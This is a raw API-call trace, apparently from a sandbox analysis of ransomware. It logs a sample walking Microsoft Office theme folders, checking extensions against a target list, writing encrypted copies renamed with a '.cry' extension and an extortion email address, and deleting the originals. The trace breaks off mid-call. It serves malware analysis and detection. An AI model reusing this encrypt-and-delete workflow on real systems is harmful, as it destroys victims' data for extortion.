lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0045.727] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.727] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0045.727] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1666) returned 1 [0045.727] CloseHandle (hObject=0x164) returned 1 [0045.727] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif")) returned 0x20 [0045.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0045.728] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.728] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0045.729] GetLastError () returned 0x0 [0045.729] ReadFile (in: hFile=0x164, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x682, lpOverlapped=0x0) returned 1 [0046.979] WriteFile (in: hFile=0x208, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x690, lpOverlapped=0x0) returned 1 [0046.980] ReadFile (in: hFile=0x164, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0046.980] WriteFile (in: hFile=0x208, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.980] SetEndOfFile (hFile=0x208) returned 1 [0047.167] CloseHandle (hObject=0x208) returned 1 [0047.168] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.168] SetEndOfFile (hFile=0x164) returned 1 [0047.188] CloseHandle (hObject=0x164) returned 1 [0047.188] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0047.188] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif")) returned 1 [0047.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.189] lstrlenW (lpString=".doc") returned 4 [0047.189] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.189] lstrlenW (lpString=".docx") returned 5 [0047.189] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.189] lstrlenW (lpString=".pdf") returned 4 [0047.189] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.189] lstrlenW (lpString=".xls") returned 4 [0047.189] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.189] lstrlenW (lpString=".xlsx") returned 5 [0047.189] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.189] lstrlenW (lpString=".ppt") returned 4 [0047.189] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.189] lstrlenW (lpString=".zip") returned 4 [0047.189] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.189] lstrlenW (lpString=".rar") returned 4 [0047.189] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.189] lstrlenW (lpString=".bz2") returned 4 [0047.189] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.189] lstrlenW (lpString=".7z") returned 3 [0047.189] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.189] lstrlenW (lpString=".dbf") returned 4 [0047.189] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.189] lstrlenW (lpString=".1cd") returned 4 [0047.189] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.189] lstrlenW (lpString=".jpg") returned 4 [0047.189] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.189] lstrlenW (lpString=".doc") returned 4 [0047.189] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.189] lstrlenW (lpString=".docx") returned 5 [0047.189] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.190] lstrlenW (lpString=".pdf") returned 4 [0047.190] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.190] lstrlenW (lpString=".xls") returned 4 [0047.190] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.190] lstrlenW (lpString=".xlsx") returned 5 [0047.190] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.190] lstrlenW (lpString=".ppt") returned 4 [0047.190] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.190] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.190] lstrlenW (lpString=".zip") returned 4 [0047.190] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.190] lstrlenW (lpString=".rar") returned 4 [0047.190] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.190] lstrlenW (lpString=".bz2") returned 4 [0047.190] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.190] lstrlenW (lpString=".7z") returned 3 [0047.190] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.190] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.190] lstrlenW (lpString=".dbf") returned 4 [0047.190] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.190] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.190] lstrlenW (lpString=".1cd") returned 4 [0047.190] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.190] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.190] lstrlenW (lpString=".jpg") returned 4 [0047.190] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.190] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0047.190] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.190] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0047.191] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=2604) returned 1 [0047.191] CloseHandle (hObject=0x164) returned 1 [0047.191] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif")) returned 0x20 [0047.191] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.191] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0047.191] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.191] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.191] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0047.259] GetLastError () returned 0x0 [0047.259] ReadFile (in: hFile=0x164, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0xa2c, lpOverlapped=0x0) returned 1 [0047.373] WriteFile (in: hFile=0x184, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xa30, lpOverlapped=0x0) returned 1 [0047.772] ReadFile (in: hFile=0x164, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0047.773] WriteFile (in: hFile=0x184, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.773] SetEndOfFile (hFile=0x184) returned 1 [0047.773] CloseHandle (hObject=0x184) returned 1 [0047.773] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.773] SetEndOfFile (hFile=0x164) returned 1 [0047.776] CloseHandle (hObject=0x164) returned 1 [0047.776] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0047.776] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif")) returned 1 [0047.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0047.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0047.776] lstrlenW (lpString=".doc") returned 4 [0047.776] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.776] lstrlenW (lpString=".docx") returned 5 [0047.776] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.776] lstrlenW (lpString=".pdf") returned 4 [0047.776] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.776] lstrlenW (lpString=".xls") returned 4 [0047.776] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.776] lstrlenW (lpString=".xlsx") returned 5 [0047.776] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.776] lstrlenW (lpString=".ppt") returned 4 [0047.776] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0047.777] lstrlenW (lpString=".zip") returned 4 [0047.777] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.777] lstrlenW (lpString=".rar") returned 4 [0047.777] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.777] lstrlenW (lpString=".bz2") returned 4 [0047.777] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.777] lstrlenW (lpString=".7z") returned 3 [0047.777] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0047.777] lstrlenW (lpString=".dbf") returned 4 [0047.777] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0047.777] lstrlenW (lpString=".1cd") returned 4 [0047.777] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0047.777] lstrlenW (lpString=".jpg") returned 4 [0047.777] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0047.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0047.777] lstrlenW (lpString=".doc") returned 4 [0047.777] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.777] lstrlenW (lpString=".docx") returned 5 [0047.777] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.777] lstrlenW (lpString=".pdf") returned 4 [0047.777] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.777] lstrlenW (lpString=".xls") returned 4 [0047.777] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.777] lstrlenW (lpString=".xlsx") returned 5 [0047.777] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.777] lstrlenW (lpString=".ppt") returned 4 [0047.777] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0047.777] lstrlenW (lpString=".zip") returned 4 [0047.777] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.777] lstrlenW (lpString=".rar") returned 4 [0047.777] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.777] lstrlenW (lpString=".bz2") returned 4 [0047.777] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.778] lstrlenW (lpString=".7z") returned 3 [0047.778] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0047.778] lstrlenW (lpString=".dbf") returned 4 [0047.778] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0047.778] lstrlenW (lpString=".1cd") returned 4 [0047.778] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0047.778] lstrlenW (lpString=".jpg") returned 4 [0047.778] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.778] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0047.778] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.778] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.156] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=29305) returned 1 [0048.156] CloseHandle (hObject=0x218) returned 1 [0048.156] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png")) returned 0x20 [0048.157] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.157] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.157] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.157] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.157] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0048.157] GetLastError () returned 0x0 [0048.157] ReadFile (in: hFile=0x218, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x7279, lpOverlapped=0x0) returned 1 [0048.247] WriteFile (in: hFile=0x184, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x7280, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x7280, lpOverlapped=0x0) returned 1 [0048.248] ReadFile (in: hFile=0x218, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0048.249] WriteFile (in: hFile=0x184, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.249] SetEndOfFile (hFile=0x184) returned 1 [0048.249] CloseHandle (hObject=0x184) returned 1 [0048.249] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.249] SetEndOfFile (hFile=0x218) returned 1 [0048.250] CloseHandle (hObject=0x218) returned 1 [0048.250] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0048.250] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png")) returned 1 [0048.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.250] lstrlenW (lpString=".doc") returned 4 [0048.250] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.250] lstrlenW (lpString=".docx") returned 5 [0048.250] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.250] lstrlenW (lpString=".pdf") returned 4 [0048.250] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.250] lstrlenW (lpString=".xls") returned 4 [0048.250] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.250] lstrlenW (lpString=".xlsx") returned 5 [0048.250] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.250] lstrlenW (lpString=".ppt") returned 4 [0048.250] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.250] lstrlenW (lpString=".zip") returned 4 [0048.251] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.251] lstrlenW (lpString=".rar") returned 4 [0048.251] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.251] lstrlenW (lpString=".bz2") returned 4 [0048.251] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.251] lstrlenW (lpString=".7z") returned 3 [0048.251] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.251] lstrlenW (lpString=".dbf") returned 4 [0048.251] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.251] lstrlenW (lpString=".1cd") returned 4 [0048.251] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.251] lstrlenW (lpString=".jpg") returned 4 [0048.251] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.251] lstrlenW (lpString=".doc") returned 4 [0048.251] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.251] lstrlenW (lpString=".docx") returned 5 [0048.251] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.251] lstrlenW (lpString=".pdf") returned 4 [0048.251] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.251] lstrlenW (lpString=".xls") returned 4 [0048.251] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.251] lstrlenW (lpString=".xlsx") returned 5 [0048.251] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.251] lstrlenW (lpString=".ppt") returned 4 [0048.251] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.251] lstrlenW (lpString=".zip") returned 4 [0048.251] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.251] lstrlenW (lpString=".rar") returned 4 [0048.251] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.251] lstrlenW (lpString=".bz2") returned 4 [0048.251] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.251] lstrlenW (lpString=".7z") returned 3 [0048.251] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.252] lstrlenW (lpString=".dbf") returned 4 [0048.252] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.252] lstrlenW (lpString=".1cd") returned 4 [0048.252] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0048.252] lstrlenW (lpString=".jpg") returned 4 [0048.252] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.252] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0048.252] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.252] CreateFileW (lpFileName="C:\\Program 